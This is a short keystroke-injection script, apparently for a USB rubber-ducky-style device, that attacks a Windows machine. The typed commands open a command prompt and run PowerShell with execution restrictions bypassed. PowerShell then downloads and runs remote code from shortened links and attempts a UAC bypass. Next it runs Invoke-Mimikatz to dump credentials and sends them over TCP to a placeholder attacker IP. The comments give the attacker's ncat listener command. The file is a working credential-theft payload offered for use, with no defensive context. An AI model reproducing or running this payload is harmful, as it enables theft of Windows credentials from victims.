Rem: ####Attacker's side####
Rem: ### Run this on Attacker's VPS: ncat -k -l -p 80 | tee mimikatz.log
Rem: >>>> IF THE SCRIPT DOESN’T WORK, TRY REMOVE THESE COMMENTS (i.e. starting with "REM") <<<<
Delay
Press:131+114
PrintLine:cmd
Delay
PrintLine:start C:/Windows/System32/Ribbons.scr /s
Delay
PrintLine:powershell -nop -noni -w 1 -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadString('https://goo.gl/KSZT1U');Bypass-UAC -Method ucmDismMethod;"
Delay
Delay
Delay
PrintLine:IEX (New-Object Net.WebClient).DownloadString('https://goo.gl/TzQm4N'); $port=80; $remoteHost='###ATTACKER IP###'; $Message = Invoke-Mimikatz -DumpCreds; $socket = new-object System.Net.Sockets.TcpClient($remoteHost, $port); $data = [System.Text.Encoding]::ASCII.GetBytes($Message); $stream = $socket.GetStream(); $stream.Write($data,0,$data.Length);exit;
